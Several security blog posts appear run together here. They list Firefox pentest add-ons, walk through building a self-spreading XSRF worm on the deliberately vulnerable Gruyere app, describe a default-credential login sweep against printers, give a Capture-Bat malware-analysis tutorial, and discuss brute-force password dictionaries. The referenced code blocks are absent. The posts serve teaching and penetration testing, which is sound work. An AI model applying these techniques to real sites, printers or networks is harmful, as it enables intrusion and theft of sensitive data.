These add-ons are mainly related to web application security, you see these types of list related to firefox add-ons but these are the ones that I think are the most helpful. Firefox has a nice category called web application security penetration testing that has a lot of the plugins I’ll mention.  Not all plugins in this category are worthwhile which is why I’m sharing my list.

Detecting cross site scripting

XSS – me

Acunetix xss scanner

I’ve included the link to the Acunetix add-on from my site. You have to sign up with Acunetix in order to receive the add-on and even then it comes bundled with an executable. If for some reason my link doesn’t work with your version of firefox then simply go to the Acunetix site and download their latest version.

Detecting sql injection

SQL inject me

Developer tools are always handy to have because if you can build it you can break it. The web developer add-on will allow you to easily see hidden form fields, javascript, cookies, etc. Firebug will allow you to easily see how the application is built by simply mouseing over the layout. Firebug is also a debugger and will allow you to set breakpoints for javascript, both are a must have.

Firebug

Web developer

Modification tools, if you want to modify a request before it’s sent to the server tamper data is a great tool inside the browser for the job. User agent switcher will allow you to pretend to be any browser you’d like, don’t forget the starbucks iphone problem. Add n edit cookies is another modification tool that will allow you to easily change cookies so that you can impersonate a cookie you have obtained.

Tamper data

User agent switcher

Add n edit cookies

Miscellaneous add-ons. Show IP is a great add-on that will show you the IP connecting to, this may seem lame at first but when you are assessing multiple environments or malware this is always handy. Leet key is another great tool inside the browser that will perform encoding (base64, URL, rot13, etc) and even generate hashes.

Show IP

Leet key

Notable mentions

Foxy proxy

Noscript

If you have any other recommendations please let me know.

When I say web app worm I mean a web site specific worm such as twitter. Twitter has been picked on (they should be because it’s a meaningless app) when it comes to web app worms so why stop now. There are other types of worms that could include web servers and databases but that won’t be addressed in this write up. The web app I’ll pick on for this example is Gruyere. Gruyere is an intentional vulnerable application that a handful of folks over at google wrote to point out some of the major vulnerabilities within web applications. Gruyere is very twitter like so my example would be relevant to other applications that function in similar ways.

Most web site worms spread because they allow javascript to be inserted somewhere into the web application. For example in twitter when a status is updated (via a moronic “tweet”) you are allowed to insert words, sentences, and even links to other interesting sites. If twitter allows you to input all this information what do they block? Javascript is a well known programming language that you should never allow to be inserted into your web application. Even though many web developers know this they continually make mistakes and allow javascript to be inserted into their web apps. There are different categories of javascript attacks such as XSS and XSRF, I’m not a big fan of this naming convention but  you should be familiar with the terms and what they mean. Most all web app worms are spread via the XSRF attack. Basically a XSRF attack is where javascript (possibly other languages) is inserted into the web app, that javascript will then make a request on behalf of the user. This request could be malicious in nature or in case of the twitter worm examples just for fun. The example I’ll be going over will be a classic XSRF attack where I’ll insert javascript to make requests on behalf of the user.

Let’s get started. I went ahead and created several accounts within Gruyere to demo the attack, in this case Travis will be the attacker.

To create a web app worm first you’ll need to discover a vulnerability within a web app that allows you to insert javascript. Luckily the “New Snippet” functionality will allow us to insert javascript. Now to find vulnerable input that allows you to insert javascript may not be that easy. In order to successfully insert javascript you’ll need to be able to insert certain characters such as “<” and “>”. One great tool to find these characters which will in turn find vulnearbilities is Firefox addon named “XSS Me”. XSS Me will tell if an input will allow certain characters. So now that we have vulnerable input how do we get this worm started? As the attacker I will place the following link into a new snippet.

Now all I’m doing here is creating a link to my evil code, to create a worm you don’t have to keep your evil code in another location you could insert all the evil code you need into the vulnerable web app itself. Most of the time inserting all of your evil code into the app itself would be ideal but it really depends on what the vulnerable app will allow you to do. Now that we’ve inserted a link to our evil code what exactly does our evil code look like, below is the source code in evil.html.

Now let’s break evil.html down line by line. All the magic is happening in line one. The first thing that is written is the html paragraph tag “<p”, this is done specifically for this app because anything after the <p> tag would allow other characters. Next is the html body tag with an “onload” action. An action in malicious code is common so that the attacker perform other steps, another common action event is an onmouseover event. Once the page loads it will call the “Wait” function, we’ll come back to that in just a bit. After the wait is the image tag (<img>) to make the XSRF request for me. The request is to add a new snippet to whomever clicks on the link. In this case if a victim were to click on my link it would create a new snippet for them with a link saying “kitten videos”. To add a new snippet within Gruyere the url would be the following

Anything after the equal sign would show up as a new snippet so I inserted the following “malicious” snippet

So what does all that mess mean? If you take all that mess and url decode it’s the following.

In this case I had to url encode my attack so that it would work, this is not uncommon when performing these types of attacks. So as the attacker I’m placing a link inside a new snippet for the victim that says “kitten videos” but that link is still pointing to my evil.html. Now let’s get back to the wait function. I won’t break it down line by line but what happens is when the page fully loads the code will jump to the wait function on line seven. After that setTimeout will execute after one second which calls the Redirect function, the Redirect function will redirect the user to the home page of Gruyere. The whole point of everything after line one is to simply redirect the user back to the homepage after the attack. So now that we have planted the seed of attack let’s see what happens when Alice clicks on our evil link.

Just by clicking on our “evil” link Alice created a snippet that she herself didn’t write, it was our malicious javascript that created the link. Now let’s login as Bob and click on the “kitten videos” in Alice’s snippets.

Bob has now updated his snippets just by simply clicking on the link in Alice’s snippet. You can now see how this can snowball much like other web app worms have spread as well. So in only a few lines of code I have created a worm that will replicate throughout the application infecting whomever clicks on my malicious link. The twitter worm was very simple as well. I could have just as easily made it that if a user were to simply view my snippet that they would get infected as well. Once you allow javascript to be inserted into your app that are a number of things an attacker can do to manipulate your application.

Hopefully this small write up at least some what explains how web app worms get created and how simple they can be. Developers of major applications such as twitter need to better test and review code they have written. As one of my links points out a seventeen year old kid exploited the mighty twitter, just goes to show you how well major applications are focusing on their security. As a user I would never click on a link that you don’t trust and turn off javascript for web apps that don’t need javascript in the first place. If another worm pops up in twitter or facebook I won’t be sad.

People often overlook printers when it comes to information security. Truth is that a ton of useful information can be found in printers. Employees will often scan sensitive documents such as social security cards, loan information, birth certificates, etc. I’ve also seen important organizational information on printers such as internal memos between higher up executives. The documents I’ve seen in the past were never meant to be shared but a default printer will more than happily share your sensitive information. Almost any new commercial printer will come with a ton of features to store and retrieve any documentation that flows through the printer (copy, scan, and print jobs). Almost all of these new printers also give you a web interface to retrieve that documentation, an example of a printer’s web interface can be seen here. When I’m performing a penetration test I always go for the web interface of a printer, the web interface is where I can grab all the sensitive information. These printers usually get unboxed and plugged into the network without much configuration from the default state, this means that the web interface is wide open with default usernames and passwords. Usually admin access to these printers will give you more access and it’s this admin access that I check for.

When you’ve only got a limited amount of time during a penetration test you want to get the best bang for your buck so I created a python script that will go and check for default usernames and passwords on certain models of printers. Below is the python script.

Usage:  at the command line type the following

So this script takes two arguments, 1) A list of IP’s you’ll want to test against, 2) Name of an output file where successful attempts are logged. If you’re having troubles running the script read my other post about running a python script. The output.txt will contain a list of IP’s that the script was able to log into. There are three variables that you’ll have to modify for your particular printer model that you are trying to scan for on your network, they are listed below.

Username and password variables should be obvious, simply put in the default username and password of the printer on your network. The only thing you’ll have to change in ‘theurl’ variable is the last quoted string. In my case it was ‘/index.html’, in your case it could be ‘/auth/login.html’. Variable ‘theurl’ builds the http request used to log into your printer’s web interface. A full example is below.

This script is doing nothing more than trying to log into the web interface of a printer, that’s it. So the script is not limited to printers, it can be used against any web application that takes a username and password. Although this script can be used against any web application there is a limitation.  This script authenticates to the printer using Basic Access Authentication. There are three main ways to authenticate to a web application.

1. HTTP Basic Access Authentication
2. HTTP Digest Access Authentication
3. HTML Form-based Authentication

So this script will not work if your web application (printer in this case) is using the second or third option. How would you know which one your printer or web application is using? Turns out OWASP has a nice write up on how to test which type of authentication your web application is using. Turns out that no one really uses one and two because they are not as secure as HTML Form-based Authentication wrapped inside SSL. Of course some printers use Basic Authentication because they are poorly built. Basic Authentication actually passes your username and password essentially in plaintext, the only way it tries to hide your username and password is by base64 encoding them which is easily transformed back into plaintext. I don’t want to get lost in the weeds to much but just knowing that your printer is using Basic Authentication is bad enough. Even if you set a strong username and password anyone sniffing network traffic would be able to determine your credentials.

I kicked this script over to Dave Huggins who has tons of experience developing Python applications and he quickly improved upon it by adding the functionality of IP ranges instead of a file. His enhancements can be seen below.

Happy printer hunting.

The main purpose of this write up is to create a tutorial for running, installing, and analyzing results of Capture-Bat. I didn’t really want to name this article “Capture-Bat tutorial” because not everyone is familiar with the tool and what its used for. When it comes to analyzing malware there are a handful of tools that every analyst should have, Capture-Bat is one of those tools. Capture-Bat will monitor changes malware makes to your system so that you can effectively determine what the malware is attempting to do. Capture-Bat does a great job of eliminating noise and ignoring “regular” windows events. It is a behavioral analysis tool which means that it does not analyze the malware itself, it only monitors changes the malware makes to the windows system. In this article I hope to highlight the best way to use the tool and what options I always use when running the tool. Capture-Bat is a free tool which can be grabbed here. I’ll get into all the details later but whenever I run this tool I execute the following command right before I execute the malware.

Below are what the options mean.

Let’s walk through an example using the zipped up malware located here (password is “malware”). For the inexperienced keep in mind you’ll need to run this malware in a virtual machine environment that is not connected to a network. Now that you’ve downloaded the malware open up two command prompts in windows (Start > Programs > Accessories > Command prompt). In the first command prompt you’ll need to start up Capture-Bat with the command above. Once you run this command you should see the following.

My output is going to c:\temp, you may have to create this directory before running the command. It looks like Capture-Bat is just sitting there but it’s actually monitoring changes to your system. It’s important to only run the malware while Capture-Bat is monitoring your system, if you launch another application it will muddy your output and you may not be able to tell it’s the malware making changes to your system or a benign application. Now that Capture-Bat is monitoring let’s go ahead run our malware. I’m a fan of running exe’s from the command line because you may get a more verbose output, so execute the command below to launch the malware.

After you execute the malware let Capture-Bat sit there and monitor events for about 30 seconds to one minute, after that time period simply go into the command prompt running Capture-Bat and type “control + c” to kill the Capture-Bat process. Next step is to open up our output.txt to see what the malware has done to the system, my output is below.

The first line is simply us executing the malware. Lines 2 – 4 is where the malware creates a file, an exe in this case, named spoolsvc.exe. Spoolsvc.exe doesn’t already exist on windows systems but spoolsv.exe does so the malware author is trying to be tricky in creating an exe that is very similar to what already exists on the system. It’s very important to note that spoolsvc.exe is not executed here but simply created, had it been executed you would have seen “process”,”created” as is seen in line one. Spoolsvc.exe is eventually executed on line 15. Line five is where a “.bat” file is created, for those that don’t know “.bat” files are windows batch scripts which contain a series of commands to be executed. Capture-Bat ends of saving this batch script which we will take a look at later. Lines 6 – 13 is where the malware is setting registry values. It appears that lines 6 – 11 are ensuring the “Local Intranet” has certain settings (see IE setting screen shot below) in internet explorer, this will allow internal connections to have a lower security setting than external connections.

My virtual machine is setup in a default and vulnerable setup, my registry values for lines 6 – 11 didn’t change after the malware was executed. Also I intentionally changed these settings before the malware executed but the malware failed to modify the registry so go figure. McAfee states that these settings are used to bypass firewalls? More information about internet explorer security settings and registry values can be found here. Also good information here about IE security zones. Lines 12 and 13 are modifying where temporary internet files and cookies are stored, in my case I didn’t notice a difference between before and after. Also I modified the default location where temporary internet files are located, the malware failed to change this location after execution so go figure once again. I haven’t contacted the developers of Capture-Bat but “SetValueKey” could also be used to query the registry? Either way the values stayed the same for me, it could have been that the malware authors wanted the registry settings for cache and cookies in a default state? Lines 14 – 15 are having cmd.exe execute the malware spoolsvc.exe. Lines 16 – 18 are setting a value in the registry. Once again these values did not change for me after the malware was executed and it appears that the value for BaseClass the value of “Driver” is default? I haven’t yet figured out why this piece of malware sets the value of BaseClass to driver but I have seen other malware perform these same actions. In lines 19 – 30 the malware and Capture-Bat delete and create certain files and processes so hopefully that output is clear to you. It gets interesting again on line 31. HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ is the location of exe’s set to run when a user logs into the system. It is very common to see malware modify these registry values to have itself execute once the user logs into the system. In this case it only modified the Spooler SubSystem App value but it’s common to see it modify other values in that location. The last two lines of the output are Capture-Bat saving deleted files. So that’s a basic analysis of this malware. I only let the malware run for about 30 seconds so it may actually perform more actions than my output.

You may be wondering why the funny name for this particular piece of malware, 40033d8063564d1b3e4b41f1d5c9a31f.exe. The experienced will recognize the name as a MD5 hash, MD5 hashing is commonly used to uniquely identify malware or any exe for that matter. I will also google search the MD5 hash of the malware to see if anyone else has run across it. Turns out others have and Anubis has a good analysis of this malware as well. Anubis reports some of the same activities as we see in our output. You can also perform a hash search over at virus total, looks like other anti-virus vendors have signatures for this malware. For the uninformed virus total will query about 40 anti-virus vendors to see which ones have seen it before. I love malware analysis sites like Anubis and Virus Total but nothing beats performing analysis on a local system. For example we were able to capture the deleted batch script that the malware executed, below is the output of that batch script.

Granted the batch script is lame, it’s a very basic script that deletes the malware and deletes itself but the batch script could have contained a lot of useful information. All deleted or modified files that Capture-Bat sees are located in the following directory.

Below is a screen shot of my deleted files for this malware.

Don’t forget that Capture-Bat collects pcap’s during the analysis under the same directory as the deleted malware, see screen shot below.

From a quick google search it doesn’t look like that memehehz.info has a great reputation. It could be that memehehz.info is a malware site or it could be that memehehz.info got infected with malware itself. The malware analyzed here isn’t the most recent malware I simply wanted to walk you through an example and how Capture-Bat can help you in the analysis of what the malware is trying to do. When it comes to analyzing malware I wouldn’t say only the tip of the iceberg has been analyzed but there is definitely more to cover. My main goal was to get others familiar with good malware analysis tools such as Capture-Bat so that they may be better able to react and respond to malicious activity on their own networks. Hopefully this helped and as always if you have any feedback I’d love to hear it.

I had the need to generate a password dictionary that would cover every possible combination for a defined character set.  I first learned to program in Python so I was going to start there first.  Before writing the program I decided to Google and see if anyone else had tackled this problem via Python, turned out they had.  Siph0n posted his Python code to create a password dictionary over at the BackTrack forums.  I wanted to post it here as a mirror and to discuss the implications of creating a password dictionary with every possible combination.  Below is the Python code.

If you’re familiar with programming and Python in particular then you could just grab the code and roll but I really wanted to discuss the usefulness of an application like this.  First I will discuss the basics of how to get this program up and running but will eventually jump into other implications such as time, storage, and usefulness of a password dictionary.

How to install and use the program

1. You must have Python installed.  If you’re running Linux (you should be) then it’s probably already installed.  If you’re running then Windows then you will have to download Python.
2. Now that you have Python installed simply copy and paste the code above into a text file and name it passwordDictionaryGenerator.py.  The .py extension is needed because that’s how Python recognizes code that it’s suppose to execute.
3. Modify appropriate variables within the program.  The only variables you may want to modify are numb, cap, and low.  These variables contain the ASCII equivalent ranges for the letters and numbers you will be using to generate your dictionary.  You may want to modify these variables so that your dictionary does not contain a-z but only a-k, I’ll leave that up to you.
4. Now to run the program simply type
   python passwordDictionaryGenerator.py

   You will have to answer the questions about which character set you want to use and how long / short your password dictionary is going to be.  Once you answer the questions it may seem like the program isn’t doing anything but it is, it will spit you back to the command line once the program has completed.  The output will be a file called wordlist.

So now you have this cool program that can generate a password dictionary for you, how big (size MB, GB, TB, etc) will this dictionary be?  How long will it take to generate this dictionary?  Let’s tackle the size question first as it will help us calculate the time as well.  The key to calculating the size is a math term called permutations.  Permutations is a simple equation to determine the number of words for that particular character set and length of word.  The basic equation is below.

n^r

n = total character set (e.g.  a-z + A-Z + 0-9 = 62)

r = length of the word

Now you’ll have to calculate n^r for each length to get every possible combination.  So for a 6 digit long password your equation will look like the following.

n⁶ + n⁵ + n⁴ + n³ + n² + n¹ = every possible combination

Let’s try an example where our character set is a-z (n = 26) and our password is no longer than 6 (r = 1-6) digits, how many words will be in our dictionary?

26⁶ + 26⁵ + 26⁴ + 26³ + 26² + 26¹ = 321,272,406 = total # of words

So now we understand how to calculate the total number of words in our dictionary.  How does that relate to the size?  Well for the most part if the length of the password is x then the size in bytes will be x + 1 for that particular line.  Then all we have to do is multiply each n^r times the size of that particular line to get the size for that particular length.  That may have just sound really confusing so hopefully the following graph clears that up some.

I went ahead and generated this dictionary, it took about 30 minutes.  Turns out the size matched my calculations.

So now you have the basic formula for calculating the size of your desired dictionary.  Let’s take a look at a larger example just to cure our curiosity.  Let’s assume the following parameters.

• character set = a-z, A-Z, & 0-9
• password length = 1-8
• n = 62
• r = 1 – 8

With these parameters the size of our dictionary jumps to 1,800 terabytes or 1.8 petabytes. Take a look at the chart below.

You can see how quickly the size jumps up. I don’t know about you but I don’t have a two petabyte drive lying around. Generating this dictionary is just infeasible. I did calculate the time it would probably take to generate this dictionary, it came out to be about 11 days. So the time to create such a dictionary is nothing compared to the storage required to house it. Not only that I don’t know to many applications that can handle a large dictionary as input, so that’s another factor you’ll have to keep in mind when generating your dictionary.

Calculating the time it takes to generate these dictionaries I’ll leave up to you.  The basic idea is that you can run the python program for a particular length password for a set amount of time and then extrapolate form there.  For the most part time isn’t really a factor but storage is. The concepts I’ve talked about here are nothing new. The idea of generating a password came to me and my coworkers as we were thinking of ways to test a WPA wireless infrastructure. Attacking WPA can be done offline so we were thinking of generating a dictionary to accomplish this. Hours later we soon realized the difficulty with generating such a large dictionary. This was actually good news because it meant that an attacker would have an extremely difficult time attacking a WPA access point with a complex password. Renderman and the Church of Wifi have thought about this problem way before I did and came up with some rainbow tables to help test the strength of your WPA access point. You can’t really create a dictionary with every single combination for a lengthy password, your best bet is to create a dictionary with the most “common” passwords, which is no easy task either.

The moral of the story is to use lengthy complex passwords with a high character set, but you knew that already. So I just suggested that this program is somewhat useless, well it is but it isn’t. You can use this program to generate a small dictionary but a large dictionary (greater than a couple of terabytes) is probably out of the question. So use this program and let me know what your results are, I’m always interested in your feedback. Happy cracking.